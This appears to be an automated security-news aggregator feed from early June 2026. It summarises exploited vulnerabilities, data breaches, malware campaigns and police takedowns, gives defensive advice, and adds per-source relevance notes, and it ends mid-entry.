This article reports the same June 2026 Android security update and the same exploited zero-day, CVE-2025-48595, adding that the release patches 124 vulnerabilities total, including 18 critical issues and one additional remote code execution bug, CVE-2026-0059.
Sergiu Gatlan 2026.06.02 100%
This article establishes a new tracked story because it is the first item here about Google's June 2026 Android patch cycle and the actively exploited Android zero-day CVE-2025-48595.
CISA warns Linux kernel container-escape flaw CVE-2022-0492 is being exploited in the wild
Urgent Patches · Threat Actors & APTs · Zero-Days & CVEs · Government · Technology & Software · CISA · Linux
CISA says attackers are now exploiting a Linux kernel bug that can let someone break out of a container and gain root-level control on the host system. The flaw, CVE-2022-0492, is an improper authentication issue in Linux cgroups v1 that allows modification of the release_agent mechanism, enabling privilege escalation and container escape; CISA added it to the Known Exploited Vulnerabilities catalog after Kaspersky reported real-world exploitation, and federal agencies were told to patch by June 5.
Why it matters: Organizations running Linux containers could be at risk of full host compromise if affected systems are unpatched. This is urgent for cloud, server, and platform teams: identify systems using cgroups v1, apply available kernel fixes, and review container hardening and isolation settings immediately.
Sources
Bill Toulas 2026.06.03 99%
This is effectively the same event: CISA's KEV addition for CVE-2022-0492, the Linux kernel cgroups v1 container-escape and privilege-escalation flaw, with the article restating affected kernel ranges and patch guidance.
Ionut Arghire 2026.06.03 100%
This article establishes a distinct tracked event: the first formal CISA KEV warning and public confirmation of in-the-wild exploitation for Linux kernel flaw CVE-2022-0492.
Attackers exploit Kirki WordPress plugin flaw CVE-2026-8206 to hijack administrator accounts
Zero-Days & CVEs · Technology & Software · Consumers & General Public · WordPress
Attackers are exploiting a critical flaw in the Kirki WordPress plugin that can let them take over administrator accounts on affected websites. CVE-2026-8206 affects Kirki versions 6.0.0 through 6.0.6 and abuses a password-reset REST API endpoint so an unauthenticated attacker can send a valid reset link for any user to an attacker-controlled email address. Wordfence says it blocked more than 222 exploit attempts in 24 hours, and the fix shipped in version 6.0.7.
Why it matters: Sites using affected Kirki versions can be quickly hijacked, letting attackers change content, install malicious plugins, or plant persistent backdoors. This is urgent for WordPress administrators: update to 6.0.7 immediately or disable the plugin, and review privileged accounts for suspicious password resets or changes.
Sources
Ionut Arghire 2026.06.03 96%
This article updates the Kirki exploitation story with Defiant's observation that thousands of attacks were blocked in the past 24 hours, estimates that roughly 150,000 sites may still be running vulnerable Kirki versions 6.0.0 to 6.0.6, and reiterates patching to 6.0.7 or later.
Bill Toulas 2026.06.02 100%
This article establishes a distinct new exploitation story centered on CVE-2026-8206 in the Kirki plugin, with active in-the-wild attacks and specific remediation guidance.
Attackers exploit Burst Statistics WordPress plugin flaw to create administrator accounts on vulnerable sites
Zero-Days & CVEs · Urgent Patches · Technology & Software · Consumers & General Public · Burst Statistics · WordPress
Attackers are targeting a flaw in the Burst Statistics WordPress plugin that can let outsiders take over websites by creating administrator accounts. Defiant says versions 3.4.0 to 3.4.1.1 contain an authentication bypass in application-password validation for REST API requests, allowing unauthenticated attackers to impersonate an admin for a request and use admin-level functions. Users should update to version 3.4.2 or newer.
Why it matters: Sites using Burst Statistics may be vulnerable to full website takeover, so this is urgent for WordPress administrators and hosting providers. Check plugin versions now, update immediately, and review for unexpected administrator accounts or suspicious REST API activity.
Sources
Ionut Arghire 2026.06.03 100%
The article establishes a distinct exploited-plugin event separate from the already tracked Kirki story by identifying active attacks against Burst Statistics, the affected versions, the attack method, and the patched version.
IMA Diligence Services says breach of third-party-managed legacy server exposed data of 525,000 people
Breaches & Data Leaks · Ransomware · Legal & Professional Services · Consumers & General Public · IMA Diligence Services
IMA Diligence Services says attackers stole sensitive personal data from a legacy server managed by a third party, affecting 525,306 people. The company says the intruders accessed the server between December 8 and December 16 and exfiltrated files containing names, addresses, Social Security numbers, driver's license numbers, financial account and credit card data, medical and health insurance information, and in some cases passport and taxpayer ID numbers. SecurityWeek says the Genesis ransomware group previously claimed the attack and said it stole 700 GB of data.
Why it matters: This is a high-impact breach because it exposed the kinds of data that can be used for identity theft, fraud, and medical or financial scams. Affected people should watch for the company's notice, enroll in credit monitoring, and consider fraud alerts or account monitoring, while defenders should review third-party legacy systems and data-retention exposure.
Sources
Ionut Arghire 2026.06.03 100%
No existing tracked story covers this specific IMA Diligence Services breach event; this article appears to be the first concrete disclosure with victim count, data types, timeline, and a possible Genesis ransomware link.
Acer warns of two maximum-severity zero-days in Wave 7 routers and says fixes are coming by end of June
Zero-Days & CVEs · Urgent Patches · Technology & Software · Consumers & General Public · Acer
Acer says two critical security holes in its Wave 7 mesh routers could let attackers break in remotely, and patches are not available yet. The flaws, CVE-2026-49200 and CVE-2026-49201, affect Wave 7 routers running firmware T7c_GBL_1.01.000055 or earlier. One bug exposes plaintext web and Telnet credentials through an unauthenticated web-accessible log file, while the other uses a hardcoded AES key in backup handling to let attackers alter backups and implant persistent backdoor access.
Why it matters: People and organizations using affected Acer Wave 7 routers could face account compromise and long-term unauthorized access if devices are exposed. This is urgent because there is no patch yet; users should disable remote management or restrict it to trusted IP addresses and apply Acer's firmware update as soon as it is released.
Sources
Sergiu Gatlan 2026.06.03 100%
This article appears to be the first clear report establishing Acer's disclosure of CVE-2026-49200 and CVE-2026-49201, the affected Wave 7 firmware versions, interim mitigations, and the expected end-of-June fix window.
Unpatched Windows Search URI flaw can leak NTLMv2 hashes when users open malicious search links
Zero-Days & CVEs · Social Engineering & Phishing · Technology & Software · Consumers & General Public · Microsoft
A newly reported Windows flaw can expose a user's NTLMv2 password hash, which attackers can try to crack or relay for unauthorized access. The issue affects the Windows Search URI protocol and can be triggered through crafted links or files that cause Windows to connect to an attacker-controlled server. The article indicates the bug is unpatched and enables hash disclosure rather than direct code execution.
Why it matters: Organizations that still rely on NTLM authentication could be exposed to credential theft from a single malicious link or lure, making this a meaningful phishing and lateral-movement risk. Defenders should block or monitor outbound SMB and WebDAV traffic, reduce NTLM use where possible, and warn users not to open unexpected search-related links or files until Microsoft issues a fix.
Sources
info@thehackernews.com (The Hacker News) 2026.06.03 100%
This appears to establish a distinct new story about an unpatched Windows Search URI credential-leak vulnerability, and it does not match any existing tracked story in the list.
Europol-backed Operation KRATOS 2 dismantles nine illegal streaming crime groups across 13 countries
Scams & Fraud · Malware · Government · Media & Entertainment · Technology & Software · Consumers & General Public · Europol
Police in Europe and the United States say they broke up nine organized crime groups running illegal streaming services and arrested 29 suspects. The seven-month Operation KRATOS 2, led by Bulgaria with Europol support, involved 13 countries and led to the removal of more than 27,000 illegal streaming URLs, identification of 18,000 IP addresses tied to illegal services, 4,370 piracy-linked domains, nearly 400,000 additional URLs flagged for suspension, and 126,000 infringing objects. Investigators say the operators split public-facing sites from backend hosting across jurisdictions to evade takedowns.
Why it matters: People using pirate streaming services are not just risking copyright trouble; Europol says these platforms can also expose users to malware, spyware, and theft of personal data. The story matters because it shows the scale and international reach of the criminal infrastructure behind these services, and affected users should avoid such platforms and check devices for suspicious software if they used them.
Sources
Sergiu Gatlan 2026.06.03 100%
This article establishes a distinct new law-enforcement event, Operation KRATOS 2, separate from the previously tracked CINEMAGOAL takedown and other anti-piracy actions because it concerns a broader seven-month multinational crackdown on nine crime groups.
CISA adds seven actively exploited flaws, including Microsoft Defender CVE-2026-41091 and CVE-2026-45498, to KEV catalog
Urgent Patches · Zero-Days & CVEs · Government · Technology & Software · Consumers & General Public · CISA · Microsoft · Adobe
CISA added seven vulnerabilities to its Known Exploited Vulnerabilities catalog on May 20, 2026, citing evidence of active exploitation. The additions include legacy Microsoft Windows, DirectX, Internet Explorer, and Adobe Reader bugs, plus Microsoft Defender flaws CVE-2026-41091 (elevation of privilege) and CVE-2026-45498 (denial of service). Federal agencies must remediate by the deadlines set under BOD 22-01.
Why it matters: KEV additions indicate real-world exploitation and help defenders prioritize patching and mitigations. Organizations, especially federal agencies, should urgently assess exposure to the newly listed Microsoft Defender and legacy Windows-related vulnerabilities.
Sources
Eduard Kovacs 2026.06.03 36%
The story intersects because RedSun (CVE-2026-41091) and UnDefend (CVE-2026-45498) are among the disclosed Microsoft flaws discussed in this article, and the piece reiterates that some are exploited in the wild. However, this source is primarily about Microsoft's handling of the disclosure controversy, not CISA's KEV action itself.
Ionut Arghire 2026.05.21 96%
This article covers the same underlying event around Microsoft Defender flaws CVE-2026-41091 and CVE-2026-45498 being actively exploited and added to KEV, and adds specific patch details: Microsoft fixed them in Defender Antimalware Platform version 4.18.26040.7, described the impacts as local SYSTEM privilege escalation and DoS, noted disabled Defender systems are not exploitable, and linked the bugs to the publicly released BlueHammer variants RedSun and UnDefend.
Sergiu Gatlan 2026.05.21 96%
This source is about the same underlying event: active exploitation of Microsoft Defender flaws CVE-2026-41091 and CVE-2026-45498. It adds Microsoft's patch rollout details, affected component versions, the impact of each flaw (SYSTEM privilege escalation and DoS), and fixed versions defenders should verify.
CISA 2026.05.20 100%
This article is the primary CISA alert establishing a new KEV-driven remediation event covering seven specifically identified exploited CVEs.
Google rolls out Android fake-call detection to warn users about AI voice-clone and caller-ID spoofing scams
Scams & Fraud · Social Engineering & Phishing · Technology & Software · Telecommunications · Consumers & General Public · Google
Google is adding a new Android feature that warns people when a call may be a scammer pretending to be someone they know. The feature, called fake call detection, is rolling out globally this month on Android 12 and later, starting with Pixel devices, and is enabled by default. It works when both parties use Phone by Google, Contacts, and Google Messages with Rich Communication Services (RCS) enabled, using encrypted device-to-device verification to detect spoofed contact calls and trigger an on-screen warning.
Why it matters: This addresses a real-world fraud tactic that combines fake caller ID with AI-generated voice impersonation, which can trick people into sending money or revealing sensitive information. Android users should keep Google's phone and messaging apps updated and treat urgent calls asking for money, codes, or account access with caution.
Sources
Sergiu Gatlan 2026.06.03 100%
This article establishes a new story because it is the rollout announcement for Google's specific Android anti-deepfake-call protection, not an update to an existing tracked event.
WeedHack malware campaign infects more than 116,000 systems through fake Minecraft mods and cheats
Malware · Social Engineering & Phishing · Scams & Fraud · Consumers & General Public · Technology & Software · Media & Entertainment · Cryptocurrency & Blockchain · Minecraft · Discord · Steam · Telegram
A large malware campaign has infected more than 116,000 computers by tricking Minecraft players into downloading booby-trapped mods, cheat clients, and utilities. McAfee says the WeedHack operation has been active since January 2026, spreads via YouTube links and search-result manipulation, and uses thousands of malicious Java archive (JAR) files. The malware steals browser passwords and cookies, Minecraft session IDs, Discord, Steam and Telegram credentials, and crypto-wallet data, while paid tiers add remote-control features such as keylogging, webcam access, shell access, and file management.
Why it matters: This is a broad consumer-focused infostealer campaign hitting gamers at scale, with stolen passwords, session tokens, and wallet data creating immediate account-takeover and financial risk. Minecraft players and parents should avoid unofficial mod download sites, remove suspicious JAR files, run antivirus scans, and reset passwords for any accounts used on affected devices.
Sources
Bill Toulas 2026.06.02 100%
This article establishes a distinct new malware campaign centered on Minecraft-themed lures, with named actor infrastructure, infection scale, and specific steal-and-remote-access capabilities.
Bill Toulas 2026.06.02 99%
This article is a direct report on the same WeedHack campaign, adding McAfee telemetry, distribution methods via YouTube and SEO poisoning, the malware-as-a-service dashboard details, and the free and premium feature sets used to steal credentials and remotely control victims' systems.
CISA says attackers are exploiting Oracle WebLogic server flaw CVE-2024-21182
Urgent Patches · Zero-Days & CVEs · Technology & Software · Oracle · CISA
A long-patched Oracle WebLogic Server vulnerability is now being exploited in real attacks, putting internet-facing servers at risk if they were not updated. CISA added CVE-2024-21182 to its Known Exploited Vulnerabilities catalog on June 1, 2026. Oracle patched the flaw in July 2024; it can be exploited remotely without authentication against affected WebLogic Server instances, and successful exploitation can expose sensitive data or allow broader server compromise.
Why it matters: Organizations running Oracle WebLogic should treat this as urgent because attackers no longer need valid logins to target exposed systems. Patch immediately, check whether any WebLogic servers are internet-accessible, and hunt for signs of compromise if updates were delayed.
Sources
info@thehackernews.com (The Hacker News) 2026.06.02 98%
This appears to be the same underlying event: active exploitation of Oracle WebLogic CVE-2024-21182 and its addition to the KEV catalog. The article mainly reinforces the KEV status and urgency rather than establishing a separate incident.
Sergiu Gatlan 2026.06.02 99%
This article is the same underlying event and adds operational detail that CISA ordered federal agencies to patch by June 4 under Binding Operational Directive 22-01, while noting affected WebLogic versions and internet exposure counts from Shodan.
Eduard Kovacs 2026.06.02 100%
This article establishes a distinct new tracked event: active exploitation and KEV listing of Oracle WebLogic CVE-2024-21182, not just Oracle's broader monthly patch cycle.
FBI warns Kali365 phishing service is hijacking Microsoft 365 accounts through OAuth device-code logins
Scams & Fraud · Social Engineering & Phishing · Consumers & General Public · Technology & Software · FBI · Microsoft
The FBI says criminals are using a Telegram-based service called Kali365 to trick people into granting access to their Microsoft 365 accounts. The phishing-as-a-service platform, first seen in April 2026, abuses Microsoft's legitimate device-code login flow so victims authorize attacker-initiated sessions; the stolen OAuth access and refresh tokens can then be reused to access Outlook, Teams and OneDrive without needing the victim's password or another multi-factor authentication prompt.
Why it matters: This matters because victims can lose control of email, files and collaboration accounts even if multi-factor authentication is enabled. Organizations using Microsoft 365 should urgently review device-code login controls and token protections, monitor for suspicious inbox rules and token use, and warn users not to enter login codes from unsolicited emails.
Sources
Arctic Wolf Labs 2026.06.02 94%
This is the same underlying Kali365 operation and device-code phishing activity, but with substantive new details: Arctic Wolf links the operator to 126 malicious hosts, shows panel and token-capture infrastructure, and says the campaign has expanded beyond Microsoft 365 lures to Okta, Xerox DocuShare, GMX, Mail.ru, Yandex Disk, Odnoklassniki, and MAX Messenger account-takeover pages.
Arctic Wolf Labs 2026.06.02 97%
This is a direct follow-up on the same Kali365 operation: it adds new technical detail about the operator’s infrastructure, a cluster of 126 malicious hosts, and expansion beyond Microsoft 365-themed lures into Outlook, Okta, Xerox DocuShare, AWS-themed pages, and a MAX Messenger account-takeover campaign while continuing to abuse Microsoft OAuth device authorization to bypass MFA.
Lawrence Abrams 2026.05.25 99%
This article is the same underlying event: the FBI public warning on Kali365. It adds detail on Kali365's Telegram-based distribution, its two attack modes including the adversary-in-the-middle 'Cookie Link' option, links to prior Arctic Wolf reporting, and the FBI's recommended mitigations such as restricting device-code authentication and reviewing unauthorized device registrations.
2026.05.22 100%
This article establishes a distinct tracked story by tying April 2026 Microsoft 365 account-takeover campaigns to the specific Kali365 phishing-as-a-service platform and adding the FBI's public warning plus operational details on how the abuse works.
Russia's FSB says foreign intelligence planted spyware on senior officials' phones
Threat Actors & APTs · Surveillance & Privacy · Government · Technology & Software · FSB
Russia's domestic security service says foreign intelligence agencies hacked the mobile phones of senior Russian officials to spy on them. The FSB alleges malware on the devices collected correspondence, calls, geolocation, contact lists, and audio and video from the phones and their surroundings, and claims the operation relied on infrastructure from major international technology companies, including content delivery and security providers. No spyware family, infection method, or technical evidence was disclosed.
Why it matters: If true, this would be a significant government-targeted mobile espionage campaign with potential impact on sensitive state communications and surveillance exposure. Defenders should watch for technical indicators or vendor confirmations before taking the claims at face value, but mobile-device compromise at this level is high consequence.
Sources
2026.06.02 100%
This article establishes a distinct new alleged espionage incident from June 2026; while it references the 2023 iPhone-focused Operation Triangulation case, it does not tie the new claims to that same operation and provides a separate event anchor.
Microsoft Android apps exposed account tokens after debug flag was left enabled in Word, Excel, PowerPoint, OneNote, Loop and Copilot
Zero-Days & CVEs · Mobile Malware · Technology & Software · Consumers & General Public · Microsoft
Six Microsoft Android apps could hand Microsoft account tokens to unauthorized apps because a debug setting was left enabled in production code. SecurityWeek reports Enclave found the issue in Word, PowerPoint, Excel, Microsoft 365 Copilot, Microsoft Loop and OneNote for Android; the flag bypassed checks meant to restrict token sharing to trusted Microsoft apps, allowing any installed app to request reusable FOCI tokens and potentially access account data. No CVE is cited in the report.
Why it matters: People and organizations using these Android apps could have had account access tokens silently stolen by another app on the same phone, potentially enabling long-lived account access. This is urgent for Microsoft mobile users and defenders: watch for Microsoft’s fix, review mobile app trust and update practices, and investigate suspicious Android apps on managed devices.
Sources
Kevin Townsend 2026.06.02 100%
This article appears to be the first reporting on this specific Microsoft Android token-exposure flaw and establishes the underlying event.
Full page
HP patches critical CVE-2026-0826 in Poly VoIP phones that can let attackers remotely take over devices
Zero-Days & CVEs, Urgent Patches, Technology & Software, Telecommunications, HP
HP released fixes for a critical flaw in several Poly Voice VoIP phone models that could let an attacker remotely seize control of a phone and use it as a foothold inside a company network. Rapid7 said CVE-2026-0826 is a stack-based buffer overflow in Session Description Protocol parsing when Interactive Connectivity Establishment is enabled, affecting Poly VVX 150/250/350/450 and Trio 8300/8500/8800 devices; a malicious SIP INVITE can trigger root-level remote code execution, and HP has published patched firmware.
Why it matters: Organizations using these desk and conference phones should treat this as urgent because compromised voice devices often sit on trusted internal networks and typically lack security tooling. Update affected Poly firmware now and disable ICE where it is not needed.
Sources
Ionut Arghire 2026.06.02 100%
This article appears to be the first tracked report establishing the disclosure, affected HP Poly models, CVE-2026-0826 details, attack path, and available mitigations.
Full page
Scammers spoof Northern Ireland police phone number to pose as officers and demand bank details and gift-card payments
Social Engineering & Phishing, Scams & Fraud, Government, Finance & Banking, Cryptocurrency & Blockchain, Consumers & General Public, Police Service of Northern Ireland
The Police Service of Northern Ireland warned that scammers spoofed its official switchboard number to call people while pretending to be police officers. In the reported case, the caller falsely claimed the target was tied to a money-transfer investigation, asked for bank-card information, and then requested gift cards and their codes; police said the number display was faked and no suspect has yet been arrested. The same police force also disclosed a separate crypto-investment fraud in which an elderly woman lost more than £250,000 after attackers persuaded her to install malware and took control of her devices.
Why it matters: People may trust a call that appears to come from a real police number, so this scam raises the risk of financial theft even for cautious users. Anyone receiving such a call should hang up, independently verify the number, and never provide banking details or gift-card codes to someone claiming to be law enforcement.
Sources
2026.06.02 100%
This article establishes a discrete, reportable fraud event: official police caller ID was spoofed to support an impersonation scam targeting the public.
Full page
Dashlane temporarily suspended some customer accounts during brute-force login attacks
Breaches & Data Leaks, Social Engineering & Phishing, Technology & Software, Consumers & General Public, Dashlane
Dashlane says it temporarily locked some customer accounts after attackers repeatedly tried to register new devices and failed the required verification step. The company said the activity began Sunday, triggered automatic protections, and later moved to monitoring after restoring affected accounts. Dashlane said its internal systems were not compromised, but did not disclose how many users were hit or whether any account takeovers succeeded.
Why it matters: Password managers hold access to many other accounts, so even unsuccessful attacks are high-impact for users. Dashlane customers should verify recent login alerts, ensure multi-factor authentication is working, and contact support if their account was suspended or shows unfamiliar device activity.
Sources
Eduard Kovacs 2026.06.02 97%
This is the same underlying Dashlane brute-force campaign and adds the key impact detail that attackers successfully compromised some accounts and downloaded fewer than 20 encrypted personal-plan vaults after brute-forcing 2FA codes to register devices.
info@thehackernews.com (The Hacker News) 2026.06.02 98%
This appears to be the same Dashlane brute-force incident and adds a key update: attackers were able to download encrypted password vaults for fewer than 20 users, refining the scope and impact beyond the earlier account suspensions.
Bill Toulas 2026.06.01 99%
This article is a direct report on the same Dashlane incident, adding vendor confirmation that an external party targeted certain accounts in brute-force attacks, that suspensions were part of built-in protections, and that affected accounts were later unsuspended while additional safeguards were being implemented.
2026.06.01 100%
This article appears to be the first tracked report of Dashlane suspending user accounts in response to an ongoing brute-force campaign targeting customer logins and device registration.
Full page
Oracle's first monthly Critical Security Patch Update fixes 77 vulnerabilities across Database, E-Business Suite, REST Data Services and other products
Urgent Patches, Zero-Days & CVEs, Technology & Software, Telecommunications, Hospitality & Travel, Government, Oracle
Oracle released its first monthly Critical Security Patch Update, fixing 77 vulnerabilities across several enterprise products used by businesses and public-sector organizations. The May 2026 update covers Oracle Database Server, REST Data Services, Communications, E-Business Suite, and Hospitality Applications, including about a dozen critical-severity flaws and multiple bugs that remote, unauthenticated attackers could exploit over a network. Oracle did not cite active exploitation in this notice but urged customers to patch quickly.
Why it matters: Organizations running affected Oracle software should treat this as a prompt patching event, especially where systems are internet-facing. Several flaws can be exploited remotely without logging in, so defenders should identify exposed Oracle services and apply the new updates as soon as possible.
Sources
Ionut Arghire 2026.06.02 100%
This article establishes a distinct patching story: Oracle's launch of monthly CSPU releases and the first batch of 77 fixes affecting multiple Oracle product lines.
Full page
Spain arrests suspect in doxing campaign that leaked personal data of INCIBE, police, prosecutors and other government employees
Breaches & Data Leaks, Surveillance & Privacy, Government, Legal & Professional Services, INCIBE, National Police, Civil Guard, State Attorney General's Office, National Security Council
Spanish police arrested a suspect accused of leaking sensitive personal data belonging to employees at key state bodies including INCIBE, the National Police, the Civil Guard, the State Attorney General's Office, and the National Security Council. Authorities say the mass publication created immediate security risks for affected staff and institutions. INCIBE previously said its own systems were not directly breached and that the leak appeared to be assembled from older breaches, credential dumps, and open-source intelligence, with some records posted on BreachForums and Doxbin.
Why it matters: This is a real-world exposure of personal data tied to government and security personnel, which can enable harassment, phishing, impersonation, and physical-safety risks. Affected organizations and employees should treat exposed details as compromised, review account security, and watch for targeted social-engineering attempts.
Sources
2026.06.01 99%
This article appears to report the same arrest and underlying doxing campaign, adding that the leaked data was posted across multiple internet platforms and affected officials tied to the National Police, Civil Guard, Attorney General's Office, National Security Council, and INCIBE, with devices seized for forensic analysis.
Bill Toulas 2026.06.01 100%
This article establishes the core event: Spanish authorities arrested the alleged doxer after a mass leak of government employee data, adding law-enforcement confirmation and scope of affected institutions.
Full page
DriveSurge hijacks thousands of legitimate websites to push ClickFix and fake browser update malware
Malware, Social Engineering & Phishing, Threat Actors & APTs, Consumers & General Public, Technology & Software, Google, Mozilla, Microsoft, Apple
A threat actor called DriveSurge has compromised thousands of real websites and is using them to redirect visitors into malware traps. Silent Push says the actor operates as an initial access broker, using the zTDS traffic distribution system to decide whether each visitor sees a ClickFix lure that tricks them into running malicious PowerShell commands or a FakeUpdate page posing as browser updates for Chrome, Firefox, Edge, Safari and others; researchers also found macOS-targeting JavaScript and more than 80 malicious injection domains.
Why it matters: People can get infected just by visiting a legitimate site that has been silently hijacked, so the risk extends beyond obviously shady pages. Organizations should hunt for the identified JavaScript injection patterns and domains, and users should only update browsers through the built-in updater and never paste commands from pop-ups into Terminal or PowerShell.
Sources
Bill Toulas 2026.06.01 100%
This article appears to be the first tracked item establishing Silent Push's reporting on the DriveSurge campaign, its use of zTDS, and its large-scale website hijacking for ClickFix and FakeUpdate malware delivery.
Full page
Inspector general says NIST mismanagement left the National Vulnerability Database with a 27,000-entry backlog
Zero-Days & CVEs, Policy & Regulation, Government, Technology & Software, NIST, CISA
A U.S. watchdog found that NIST’s National Vulnerability Database, a key public source used to track and prioritize software flaws, has become ineffective after mismanagement caused a massive processing backlog. The report says unprocessed vulnerability records grew from about 13,000 in February 2024 to more than 27,000 by the end of 2025, after NIST stopped paying contractors, missed its recovery goals, and duplicated at least 21,000 pieces of work already handled by CISA’s Vulnrichment program.
Why it matters: This matters because companies, government agencies, and security teams rely on NVD data to decide what to fix first, and delays can slow patching and risk decisions across the ecosystem. Affected users are indirect but broad: defenders may need to lean more on vendor advisories, CISA KEV, and other sources until NVD processing becomes reliable again.
Sources
2026.06.01 100%
This article establishes a distinct oversight and infrastructure story about NIST’s vulnerability-processing failures and the operational impact on the National Vulnerability Database, rather than updating a specific CVE or exploit event.
Full page
Researchers track 5,000+ election-themed domains and exposed political credentials ahead of the 2026 U.S. midterms
Social Engineering & Phishing, Scams & Fraud, Disinformation & Influence Ops, Government, Nonprofits & NGOs, Consumers & General Public, ActBlue, WinRed, GOP, Democrats.org, USA.gov
Security researchers say more than 5,000 election-themed internet domains were registered in recent weeks ahead of the 2026 U.S. midterms, raising the risk of fake voting sites, donation scams, and impersonation of election officials. Check Point said the registrations increased sharply between April and May and coincided with roughly 17,000 exposed credentials tied to ActBlue, WinRed, GOP, Democrats.org, and USA.gov accounts, creating infrastructure and account access that could support phishing, fraud, or influence operations.
Why it matters: This matters because voters, donors, campaigns, and election workers could be tricked by lookalike sites or targeted through reused or stolen passwords. People should verify election and donation websites carefully, avoid links in unsolicited messages, and reset passwords if they may have been exposed.
Sources
2026.06.01 100%
This article establishes a distinct 2026 midterm-election threat story centered on a surge of election-themed domains and exposed credentials that could be used for phishing, impersonation, fraud, and misinformation.
Full page
Attackers exploit WP Maps Pro WordPress plugin flaw CVE-2026-8732 to create administrator accounts
Urgent Patches, Zero-Days & CVEs, Technology & Software, Consumers & General Public, WP Maps Pro, WordPress
Attackers are trying to take over WordPress sites that use the WP Maps Pro plugin by secretly creating their own administrator accounts. The bug, CVE-2026-8732, affects WP Maps Pro 6.1.0 and earlier and stems from an unauthenticated AJAX endpoint tied to a temporary support-access feature; a crafted request can create an admin user and generate a passwordless login link. Wordfence says it blocked more than 3,600 exploitation attempts in 24 hours, and the vendor fixed the issue in version 6.1.1 on May 20, 2026.
Why it matters: Any site running the vulnerable plugin can be fully taken over, letting attackers plant backdoors, change content, or steal data. Users should update WP Maps Pro to 6.1.1 or later immediately and review WordPress admin accounts for unexpected new users.
Sources
Ionut Arghire 2026.06.01 99%
This article covers the same underlying event: active exploitation of CVE-2026-8732 in the WP Maps Pro plugin. It adds technical details on the root cause in the AJAX temporary-access callback, notes that version 6.1.1 fixes the issue, and reports Defiant blocked more than 1,700 attack attempts in 24 hours.
info@thehackernews.com (The Hacker News) 2026.06.01 99%
This article covers the same underlying event: active exploitation of the WP Maps Pro flaw CVE-2026-8732 to create rogue admin accounts on vulnerable WordPress sites.
Bill Toulas 2026.05.31 100%
This article establishes a distinct new story: active exploitation of CVE-2026-8732 in the WP Maps Pro plugin, including the flaw details, affected versions, patch release, and observed attack volume.
Full page
Dutch police say they disrupted a botnet of at least 17 million infected devices after tracing 200 servers in the Netherlands
Malware, Threat Actors & APTs, Government, Technology & Software, Telecommunications, Consumers & General Public, Dutch Police, NCSC-NL
Dutch police say they helped dismantle a botnet made up of at least 17 million compromised devices, with 200 supporting servers traced to the Netherlands and seized or shut down with help from a hosting provider. Authorities and NCSC-NL did not name the botnet or specify the exact malware family, but said affected devices likely included poorly secured routers, mobile devices, and Internet of Things hardware commonly abused for phishing, distributed denial-of-service attacks, and online fraud.
Why it matters: A botnet this large can be used to hide attacks, knock services offline, and abuse ordinary people's devices without their knowledge. Users and organizations should check internet-connected devices for updates, replace default passwords, and avoid unofficial app sources while defenders watch for follow-on indicators once police release more details.
Sources
Ionut Arghire 2026.06.01 99%
This article is another report on the same Dutch police takedown, adding that authorities seized several command-and-control servers from a Dutch hosting provider, that local reporting identified the targeted service as Asocks, and that the botnet included infected computers, smartphones, and tablets used for residential proxy abuse and cybercrime.
Bill Toulas 2026.05.29 99%
This is the same underlying event: Dutch police and the NCSC disrupting a botnet of at least 17 million infected devices and seizing more than 200 servers in the Netherlands. The article adds attribution reported by local media linking the infrastructure to the Asocks proxy service and notes authorities' view that affected device owners likely did not knowingly participate.
2026.05.29 100%
This article appears to be the first report establishing this specific Dutch police takedown of an unnamed 17 million-device botnet, and it does not match any listed existing tracked story.
Full page
Malware on nearly 2,000 WordPress sites used Steam profiles to hide command data and maintain backdoor access
Malware, Technology & Software, Consumers & General Public, WordPress, Steam
A long-running malware campaign infected about 1,980 WordPress websites and hid its command-and-control data inside Steam Community profile comments. GoDaddy says the malware, tracked since July 2025, uses invisible Unicode characters in Steam comments to encode a payload that builds a hello-mywordl[.]info URL, then injects JavaScript disguised as common libraries and installs a PHP backdoor that executes code sent in specially crafted POST requests with a specific cookie. The initial compromise route is unknown but may involve stolen WordPress or FTP credentials, vulnerable themes or plugins, or a supply-chain compromise.
Why it matters: WordPress site owners and hosting teams should treat this as an active website compromise, not just a nuisance script, because it includes a persistent backdoor that can reinfect a site if cleanup is incomplete. Check for outbound requests to Steam from WordPress servers, suspicious JavaScript injections, and restore from a known-good backup where possible.
Sources
Bill Toulas 2026.06.01 100%
This article establishes a distinct malware campaign centered on WordPress infections that conceal payloads in Steam profile comments, with no matching tracked story covering this same operation.
Full page
Attackers are now exploiting Windows Server Netlogon remote-code-execution flaw CVE-2026-41089
Zero-Days & CVEs, Urgent Patches, Technology & Software, Government, Microsoft, Centre for Cybersecurity Belgium
A critical Windows Server security flaw that can let outsiders run code on domain controllers is now being exploited in real attacks. Belgium's Centre for Cybersecurity said CVE-2026-41089, a stack-based buffer overflow in the Netlogon remote procedure call (RPC) service, is under active exploitation after Microsoft patched it in May 2026. The bug affects supported Windows Server versions including Windows Server 2025 and can be triggered by a specially crafted network request without prior authentication.
Why it matters: Domain controllers are the systems that authenticate users across many business networks, so compromise can put an entire organization at risk. Organizations running Windows Server should treat this as high priority and patch exposed and internal domain controllers immediately.
Sources
Ionut Arghire 2026.06.01 98%
This article covers the same underlying event: CCB warning that CVE-2026-41089 in Windows Netlogon is being exploited in the wild. It adds detail that Microsoft patched the stack-based buffer overflow on May 12, that exploitation can occur via crafted network requests against domain controllers without authentication, and that Microsoft had not yet updated its advisory to reflect exploitation.
Sergiu Gatlan 2026.06.01 100%
This article establishes a new tracked story by adding the key development that CVE-2026-41089 has moved from a patched critical flaw to one reportedly being exploited in the wild.
Full page
Atlas Menu cheat service breach exposed 64,000 user records after database was posted to GitHub
Breaches & Data Leaks, Technology & Software, Media & Entertainment, Consumers & General Public, Atlas Menu, Rockstar Games, Valve
Atlas Menu, a cheat service for Grand Theft Auto V and Counter-Strike 2, was breached and data on about 64,000 users was published to GitHub. The leaked database reportedly includes email addresses, usernames, IP addresses, support tickets, signup dates, license keys, Rockstar account identifiers, and passwords stored as bcrypt hashes, along with internal records such as banned-user lists and administrator logs. The attacker claimed access to all Atlas systems.
Why it matters: Affected users face account, privacy, and follow-on phishing risks, especially if they reused passwords elsewhere. Users should reset any reused passwords, watch for scams referencing Atlas or Rockstar accounts, and treat the exposed support and purchase data as potentially sensitive.
Sources
2026.06.01 100%
This article appears to be the first clear report establishing the Atlas Menu breach as a discrete data-leak event with scope, affected data types, and public exposure via GitHub.
Full page
Palo Alto says attackers are exploiting GlobalProtect VPN auth bypass flaw CVE-2026-0257
Urgent Patches, Zero-Days & CVEs, Palo Alto Networks, CISA
